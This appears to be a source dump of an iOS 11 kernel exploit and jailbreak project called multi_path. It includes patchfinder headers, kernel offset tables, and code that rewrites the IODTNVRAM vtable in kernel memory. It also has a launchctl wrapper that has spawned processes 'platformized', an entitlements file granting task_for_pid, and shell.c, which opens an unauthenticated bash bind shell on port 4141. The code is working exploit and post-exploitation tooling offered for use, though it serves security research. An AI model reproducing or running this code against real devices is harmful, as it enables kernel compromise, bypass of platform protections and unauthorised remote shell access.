 5 | #define OSString_CStringPtr(str) kread64(str + 0x10)
 6 | #define OSArray_ItemCount(arr) kread32(arr+0x14)
 7 | #define OSArray_ItemBuffer(arr) kread64(arr+32)
 8 | 
 9 | // see osobject.c for info
10 | 
11 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
12 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
13 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
14 | void OSArray_RemoveObject(uint64_t array, unsigned int idx);
15 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
16 | int OSArray_Merge(uint64_t array, uint64_t aArray);
17 | uint64_t OSUnserializeXML(const char* buffer);
18 | 
19 | void OSObject_Release(uint64_t osobject);
20 | void OSObject_Retain(uint64_t osobject);
21 | uint32_t OSObject_GetRetainCount(uint64_t osobject);
22 | 
23 | unsigned int OSString_GetLength(uint64_t osstring);
24 | char *OSString_CopyString(uint64_t osstring);
25 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/patchfinder64.h:
--------------------------------------------------------------------------------
 1 | #ifndef PATCHFINDER64_H_
 2 | #define PATCHFINDER64_H_
 3 | 
 4 | int init_kernel(uint64_t base, const char *filename);
 5 | void term_kernel(void);
 6 | 
 7 | // Fun part
 8 | uint64_t find_allproc(void);
 9 | uint64_t find_add_x0_x0_0x40_ret(void);
10 | uint64_t find_copyout(void);
11 | uint64_t find_bzero(void);
12 | uint64_t find_bcopy(void);
13 | uint64_t find_rootvnode(void);
14 | uint64_t find_trustcache(void);
15 | uint64_t find_amficache(void);
16 | uint64_t find_OSBoolean_True(void);
17 | uint64_t find_OSBoolean_False(void);
18 | uint64_t find_zone_map_ref(void);
19 | uint64_t find_osunserializexml(void);
20 | uint64_t find_smalloc(void);
21 | #endif
22 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/qilin.o


--------------------------------------------------------------------------------
/multi_path/jelbrek/remap_tfp_set_hsp.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  remap_tfp_set_hsp.h
 3 | //  electra
 4 | //
 5 | //  Created by Viktor Oreshkin on 16.01.18.
 6 | //  Copyright © 2018 Electra Team. All rights reserved.
 7 | //
 8 | 
 9 | #ifndef remap_tfp_set_hsp_h
10 | #define remap_tfp_set_hsp_h
11 | 
12 | #include <mach/mach.h>
13 | 
14 | int remap_tfp0_set_hsp4(mach_port_t *port);
15 | 
16 | #endif /* remap_tfp_set_hsp_h */
17 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.c:
--------------------------------------------------------------------------------
  1 | 
  2 | /* J. Levin has compiled a bunch of Apple opensource utilites for arm64
  3 |  * You can get them from his site here: http://newosxbook.com/tools/iOSBinaries.html
  4 |  *
  5 |  * Follow the link to "The 64-bit tgz pack"
  6 |  *
  7 |  * Unpack the tarball into a directory called iosbinpack64 and drag-and-drop
  8 |  * that directory into the directory with all the source files in in XCode
  9 |  * so that it ends up in the .app bundle
 10 |  */
 11 | 
 12 | #include <stdio.h>
 13 | #include <stdlib.h>
 14 | #include <string.h>
 15 | #include <unistd.h>
 16 | 
 17 | #include <spawn.h>
 18 | 
 19 | #include <sys/types.h>
 20 | #include <sys/stat.h>
 21 | #include <dirent.h>
 22 | 
 23 | #include <sys/socket.h>
 24 | #include <sys/types.h>
 25 | #include <arpa/inet.h>
 26 | 
 27 | #include <CoreFoundation/CoreFoundation.h>
 28 | 
 29 | char* bundle_path() {
 30 |     CFBundleRef mainBundle = CFBundleGetMainBundle();
 31 |     CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle);
 32 |     int len = 4096;
 33 |     char* path = malloc(len);
 34 |     
 35 |     CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len);
 36 |     
 37 |     return path;
 38 | }
 39 | 
 40 | char* prepare_directory(char* dir_path) {
 41 |     DIR *dp;
 42 |     struct dirent *ep;
 43 |     
 44 |     char* in_path = NULL;
 45 |     char* bundle_root = bundle_path();
 46 |     asprintf(&in_path, "%s/iosbinpack64/%s", bundle_root, dir_path);
 47 |     
 48 |     
 49 |     dp = opendir(in_path);
 50 |     if (dp == NULL) {
 51 |         printf("unable to open payload directory: %s\n", in_path);
 52 |         return NULL;
 53 |     }
 54 |     
 55 |     while ((ep = readdir(dp))) {
 56 |         char* entry = ep->d_name;
 57 |         char* full_entry_path = NULL;
 58 |         asprintf(&full_entry_path, "%s/iosbinpack64/%s/%s", bundle_root, dir_path, entry);
 59 |         
 60 |         printf("preparing: %s\n", full_entry_path);
 61 |         
 62 |         // make that executable:
 63 |         int chmod_err = chmod(full_entry_path, 0777);
 64 |         if (chmod_err != 0){
 65 |             printf("chmod failed\n");
 66 |         }
 67 |         
 68 |         free(full_entry_path);
 69 |     }
 70 |     
 71 |     closedir(dp);
 72 |     free(bundle_root);
 73 |     
 74 |     return in_path;
 75 | }
 76 | 
 77 | // prepare all the payload binaries under the iosbinpack64 directory
 78 | // and build up the PATH
 79 | char* prepare_payload() {
 80 |     char* path = calloc(4096, 1);
 81 |     strcpy(path, "PATH=");
 82 |     char* dir;
 83 |     dir = prepare_directory("bin");
 84 |     strcat(path, dir);
 85 |     strcat(path, ":");
 86 |     free(dir);
 87 |     
 88 |     dir = prepare_directory("sbin");
 89 |     strcat(path, dir);
 90 |     strcat(path, ":");
 91 |     free(dir);
 92 |     
 93 |     dir = prepare_directory("usr/bin");
 94 |     strcat(path, dir);
 95 |     strcat(path, ":");
 96 |     free(dir);
 97 |     
 98 |     dir = prepare_directory("usr/local/bin");
 99 |     strcat(path, dir);
100 |     strcat(path, ":");
101 |     free(dir);
102 |     
103 |     dir = prepare_directory("usr/sbin");
104 |     strcat(path, dir);
105 |     strcat(path, ":");
106 |     free(dir);
107 |     
108 |     strcat(path, "/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec");
109 |     
110 |     return path;
111 | }
112 | 
113 | void do_bind_shell(char* env, int port) {
114 |     char* bundle_root = bundle_path();
115 |     
116 |     char* shell_path = NULL;
117 |     asprintf(&shell_path, "%s/iosbinpack64/bin/bash", bundle_root);
118 |     
119 |     char* argv[] = {shell_path, NULL};
120 |     char* envp[] = {env, NULL};
121 |     
122 |     struct sockaddr_in sa;
123 |     sa.sin_len = 0;
124 |     sa.sin_family = AF_INET;
125 |     sa.sin_port = htons(port);
126 |     sa.sin_addr.s_addr = INADDR_ANY;
127 |     
128 |     int sock = socket(PF_INET, SOCK_STREAM, 0);
129 |     bind(sock, (struct sockaddr*)&sa, sizeof(sa));
130 |     listen(sock, 1);
131 |     
132 |     printf("shell listening on port %d\n", port);
133 |     
134 |     for(;;) {
135 |         int conn = accept(sock, 0, 0);
136 |         
137 |         posix_spawn_file_actions_t actions;
138 |         
139 |         posix_spawn_file_actions_init(&actions);
140 |         posix_spawn_file_actions_adddup2(&actions, conn, 0);
141 |         posix_spawn_file_actions_adddup2(&actions, conn, 1);
142 |         posix_spawn_file_actions_adddup2(&actions, conn, 2);
143 |         
144 |         
145 |         pid_t spawned_pid = 0;
146 |         int spawn_err = posix_spawn(&spawned_pid, shell_path, &actions, NULL, argv, envp);
147 |         
148 |         if (spawn_err != 0){
149 |             perror("shell spawn error");
150 |         } else {
151 |             printf("shell posix_spawn success!\n");
152 |         }
153 |         
154 |         posix_spawn_file_actions_destroy(&actions);
155 |         
156 |         printf("our pid: %d\n", getpid());
157 |         printf("spawned_pid: %d\n", spawned_pid);
158 |         
159 |         int wl = 0;
160 |         while (waitpid(spawned_pid, &wl, 0) == -1 && errno == EINTR);
161 |     }
162 | }
163 | 
164 | void drop_payload() {
165 |     char* env_path = prepare_payload();
166 |     printf("will launch a shell with this environment: %s\n", env_path);
167 |     
168 |     do_bind_shell(env_path, 4141);
169 |     free(env_path);
170 | }
171 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.h:
--------------------------------------------------------------------------------
1 | #ifndef drop_payload_h
2 | #define drop_payload_h
3 | 
4 | void drop_payload();
5 | char* prepare_payload();
6 | char* bundle_path();
7 | 
8 | #endif
9 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.c:
--------------------------------------------------------------------------------
 1 | // iOS 11 moves OFVariables to const
 2 | // https://twitter.com/s1guza/status/908790514178301952
 3 | // however, if we:
 4 | //  1) Can find IODTNVRAM service
 5 | //  2) Have tfp0 / kernel read|write|alloc
 6 | //  3) Can leak kernel address of mach port
 7 | // then we can fake vtable on IODTNVRAM object
 8 | // async_wake satisfies those requirements
 9 | // however, I wasn't able to actually set or get ANY nvram variable
10 | // not even userread/userwrite
11 | // Guess sandboxing won't let to access nvram
12 | 
13 | #include <stdlib.h>
14 | #include <CoreFoundation/CoreFoundation.h>
15 | #include "kern_utils.h"
16 | #include "offsetof.h"
17 | #include "../offsets.h"
18 | 
19 | // convertPropToObject calls getOFVariableType
20 | // open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
21 | // find xrefs, figure out vtable start from that
22 | // following are offsets of entries in vtable
23 | 
24 | // it always returns false
25 | const uint64_t searchNVRAMProperty = 0x590;
26 | // 0 corresponds to root only
27 | const uint64_t getOFVariablePerm = 0x558;
28 | 
29 | typedef mach_port_t io_service_t;
30 | typedef mach_port_t io_connect_t;
31 | extern const mach_port_t kIOMasterPortDefault;
32 | CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
33 | io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
34 | 
35 | 
36 | // get kernel address of IODTNVRAM object
37 | uint64_t get_iodtnvram_obj(void) {
38 |     // get user serv
39 |     io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
40 |     
41 |     // leak user serv
42 |     uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
43 |     // get kern obj -- IODTNVRAM*
44 |     uint64_t IODTNVRAMObj = kread64(nvram_up + offsetof_ip_kobject);
45 |     
46 |     return IODTNVRAMObj;
47 | }
48 | 
49 | void unlocknvram(void) {
50 |     const uint64_t searchNVRAMProperty = 0x590;
51 |     // 0 corresponds to root only
52 |     const uint64_t getOFVariablePerm = 0x558;
53 |     // get user serv
54 |     io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
55 |     
56 |     // leak user serv
57 |     // it should use via_kmem_read method by now, so second param doesn't matter
58 |     uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
59 |     // get kern obj -- IODTNVRAM*
60 |     uint64_t IODTNVRAMObj = kread64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
61 |     uint64_t vtable_start = kread64(IODTNVRAMObj);
62 |     uint64_t vtable_end = vtable_start;
63 |     // Is vtable really guaranteed to end with 0 or was it just a coincidence?..
64 |     // should we just use some max value instead?
65 |     while (kread64(vtable_end) != 0) vtable_end += sizeof(uint64_t);
66 |     
67 |     uint32_t vtable_len = (uint32_t) (vtable_end - vtable_start);
68 |     
69 |     // copy vtable to userspace
70 |     uint64_t *buf = calloc(1, vtable_len);
71 |     kread(vtable_start, buf, vtable_len);
72 |     
73 |     // alter it
74 |     buf[getOFVariablePerm/sizeof(uint64_t)] = buf[searchNVRAMProperty/sizeof(uint64_t)];
75 |     
76 |     // allocate buffer in kernel and copy it back
77 |     uint64_t fake_vtable = kmem_alloc_wired(vtable_len);
78 |     kwrite(fake_vtable, buf, vtable_len);
79 |     
80 |     // replace vtable on IODTNVRAM object
81 |     kwrite64(IODTNVRAMObj, fake_vtable);
82 |     
83 |     free(buf);
84 | }
85 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.h:
--------------------------------------------------------------------------------
1 | void unlocknvram(void);
2 | 


--------------------------------------------------------------------------------
/multi_path/kmem.h:
--------------------------------------------------------------------------------
 1 | #ifndef kmem_h
 2 | #define kmem_h
 3 | 
 4 | extern mach_port_t tfp0;
 5 | 
 6 | uint32_t rk32(uint64_t kaddr);
 7 | uint64_t rk64(uint64_t kaddr);
 8 | 
 9 | void wk32(uint64_t kaddr, uint32_t val);
10 | void wk64(uint64_t kaddr, uint64_t val);
11 | 
12 | #endif
13 | 


--------------------------------------------------------------------------------
/multi_path/launchctl/Ent.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>platform-application</key>
 6 | 	<true/>
 7 | 	<key>get-task-allow</key>
 8 | 	<true/>
 9 | 	<key>com.apple.system-task-ports</key>
10 | 	<true/>
11 | 	<key>task_for_pid-allow</key>
12 | 	<true/>
13 |     <key>com.apple.private.security.container-required</key>
14 |     <false/>
15 | </dict>
16 | </plist>
17 | 
18 | 


--------------------------------------------------------------------------------
/multi_path/launchctl/Makefile:
--------------------------------------------------------------------------------
 1 | TARGET  = launchctl
 2 | OUTDIR ?= bin
 3 | 
 4 | CC      = xcrun -sdk iphoneos cc -arch arm64
 5 | # it is injected into trust cache by code
 6 | # which only supports sha-256 signatures
 7 | LDID    = ldid2
 8 | CFLAGS  = -Wall -Iinclude
 9 | 
10 | .PHONY: all clean
11 | 
12 | DEBUG ?= 0
13 | ifeq ($(DEBUG), 1)
14 |     CFLAGS += -DINJECT_CRITICALD_DEBUG
15 | else
16 |     CFLAGS += -O2
17 | endif
18 | 
19 | all: $(OUTDIR)/$(TARGET)
20 | 
21 | $(OUTDIR):
22 | 	mkdir -p $(OUTDIR)
23 | 
24 | $(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
25 | 	$(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
26 | 	$(LDID) -SEnt.plist $@
27 | 
28 | clean:
29 | 	rm -f $(OUTDIR)/$(TARGET)
30 | 


--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
1 | @interface CPBitmapStore : NSObject
2 | 
3 | - (void)purge;
4 | 
5 | @end
6 | 


--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
 1 | @interface CPDistributedMessagingCenter : NSObject
 2 | 
 3 | + (instancetype)centerNamed:(NSString *)name;
 4 | 
 5 | - (void)runServer;
 6 | - (void)runServerOnCurrentThread;
 7 | - (void)stopServer;
 8 | 
 9 | - (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;
10 | 
11 | - (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
12 | 
13 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
14 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;
15 | 
16 | @end
17 | 


--------------------------------------------------------------------------------
/multi_path/launchctl/main.m:
--------------------------------------------------------------------------------
 1 | #import <Foundation/Foundation.h>
 2 | #include <AppSupport/CPDistributedMessagingCenter.h>
 3 | #include <spawn.h>
 4 | 
 5 | int main(int argc, const char* argv[], const char* envp[]) {
 6 |     
 7 |     CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"];
 8 |     
 9 |     pid_t pd;
10 |     posix_spawnattr_t attr;
11 |     posix_spawnattr_init(&attr);
12 |     posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED); //this flag will make the created process stay frozen until we send the CONT signal. This so we can platformize it before it launches.
13 |     
14 |     NSString *reallaunchctl = [NSString stringWithFormat:@"%@/launchctl_", [[NSBundle mainBundle] bundlePath]];
15 |     
16 |     int rv = posix_spawn(&pd, [reallaunchctl UTF8String], NULL, &attr, argv, envp);
17 |     
18 |     [messageCenter sendMessageAndReceiveReplyName:@"platformize" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", pd] forKey:@"pid"]];
19 | 
20 |     kill(pd, SIGCONT); //continue
21 |     
22 |     int a;
23 |     waitpid(pd, &a, 0);
24 |     
25 |     return rv;
26 | }
27 | 


--------------------------------------------------------------------------------
/multi_path/main.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  main.m
 3 | //  multi_path
 4 | //
 5 | //  Created by Ian Beer on 5/28/18.
 6 | //  Copyright © 2018 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #import <UIKit/UIKit.h>
10 | #import "AppDelegate.h"
11 | 
12 | int main(int argc, char * argv[]) {
13 |   @autoreleasepool {
14 |       return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/multi_path/multi_path.entitlements:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
3 | <plist version="1.0">
4 | <dict>
5 | 	<key>com.apple.developer.networking.multipath</key>
6 | 	<true/>
7 | </dict>
8 | </plist>
9 | 


--------------------------------------------------------------------------------
/multi_path/offsets.h:
--------------------------------------------------------------------------------
 1 | #ifndef offsets_h
 2 | #define offsets_h
 3 | 
 4 | enum kstruct_offset {
 5 |   /* struct task */
 6 |   KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 7 |   KSTRUCT_OFFSET_TASK_REF_COUNT,
 8 |   KSTRUCT_OFFSET_TASK_ACTIVE,
 9 |   KSTRUCT_OFFSET_TASK_VM_MAP,
10 |   KSTRUCT_OFFSET_TASK_NEXT,
11 |   KSTRUCT_OFFSET_TASK_PREV,
12 |   KSTRUCT_OFFSET_TASK_ITK_SPACE,
13 |   KSTRUCT_OFFSET_TASK_BSD_INFO,
14 |   
15 |   /* struct ipc_port */
16 |   KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
17 |   KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
18 |   KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
19 |   KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
20 |   KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
21 |   KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
22 |   KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
23 |   KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
24 |   KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
25 |   
26 |   /* struct proc */
27 |   KSTRUCT_OFFSET_PROC_PID,
28 |   KSTRUCT_OFFSET_PROC_P_FD,
29 |   
30 |   /* struct filedesc */
31 |   KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
32 |   
33 |   /* struct fileproc */
34 |   KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
35 |   
36 |   /* struct fileglob */
37 |   KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
38 |   
39 |   /* struct socket */
40 |   KSTRUCT_OFFSET_SOCKET_SO_PCB,
41 |   
42 |   /* struct pipe */
43 |   KSTRUCT_OFFSET_PIPE_BUFFER,
44 |   
45 |   /* struct ipc_space */
46 |   KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
47 |   KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
48 |   
49 |   KFREE_ADDR_OFFSET,
50 | };
51 | 
52 | int koffset(enum kstruct_offset offset);
53 | void offsets_init(void);
54 | 
55 | #endif
56 | 


--------------------------------------------------------------------------------
/multi_path/offsets.m:
--------------------------------------------------------------------------------
  1 | #import <Foundation/Foundation.h>
  2 | 
  3 | #include <stdio.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <sys/sysctl.h>
  7 | #include <sys/utsname.h>
  8 | 
  9 | #include "offsets.h"
 10 | 
 11 | int* offsets = NULL;
 12 | 
 13 | int kstruct_offsets_11_0[] = {
 14 |   0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 15 |   0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
 16 |   0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
 17 |   0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
 18 |   0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
 19 |   0x30,  // KSTRUCT_OFFSET_TASK_PREV,
 20 |   0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
 21 |   0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
 22 |   
 23 |   0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
 24 |   0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
 25 |   0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
 26 |   0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
 27 |   0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
 28 |   0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
 29 |   0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
 30 |   0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
 31 |   0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
 32 |   
 33 |   0x10,  // KSTRUCT_OFFSET_PROC_PID,
 34 |   0x108, // KSTRUCT_OFFSET_PROC_P_FD
 35 |   
 36 |   0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 37 |   
 38 |   0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
 39 |   
 40 |   0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
 41 |   
 42 |   0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB
 43 |   
 44 |   0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER
 45 |   
 46 |   0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
 47 |   0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
 48 |   
 49 |   0x6c,  // KFREE_ADDR_OFFSET
 50 | };
 51 | 
 52 | int kstruct_offsets_11_3[] = {
 53 |   0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 54 |   0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
 55 |   0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
 56 |   0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
 57 |   0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
 58 |   0x30,  // KSTRUCT_OFFSET_TASK_PREV,
 59 |   0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
 60 |   0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
 61 |   
 62 |   0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
 63 |   0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
 64 |   0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
 65 |   0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
 66 |   0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
 67 |   0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
 68 |   0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
 69 |   0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
 70 |   0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
 71 |   
 72 |   0x10,  // KSTRUCT_OFFSET_PROC_PID,
 73 |   0x108, // KSTRUCT_OFFSET_PROC_P_FD
 74 |   
 75 |   0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 76 |   
 77 |   0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
 78 |   
 79 |   0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
 80 |   
 81 |   0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB
 82 |   
 83 |   0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER
 84 |   
 85 |   0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
 86 |   0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
 87 |   
 88 |   0x7c,  // KFREE_ADDR_OFFSET
 89 | };
 90 | 
 91 | int koffset(enum kstruct_offset offset) {
 92 |   if (offsets == NULL) {
 93 |     printf("need to call offsets_init() prior to querying offsets\n");
 94 |     return 0;
 95 |   }
 96 |   return offsets[offset];
 97 | }
 98 | 
 99 | 
100 | void offsets_init() {
101 |   if (@available(iOS 11.4, *)) {
102 |     printf("this bug is patched in iOS 11.4 and above\n");
103 |     exit(EXIT_FAILURE);
104 |   } else if (@available(iOS 11.3, *)) {
105 |     printf("offsets selected for iOS 11.3 or above\n");
106 |     offsets = kstruct_offsets_11_3;
107 |   } else if (@available(iOS 11.0, *)) {
108 |     printf("offsets selected for iOS 11.0 to 11.2.6\n");
109 |     offsets = kstruct_offsets_11_0;
110 |   } else {
111 |     printf("iOS version too low, 11.0 required\n");
112 |     exit(EXIT_FAILURE);
113 |   }
114 | }
115 | 


--------------------------------------------------------------------------------
/multi_path/sploit.h:
--------------------------------------------------------------------------------
1 | #ifndef sploit_h
2 | #define sploit_h
3 | 
4 | mach_port_t run(void);
5 | 
6 | #endif
7 | 


--------------------------------------------------------------------------------
/multi_path/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/test


--------------------------------------------------------------------------------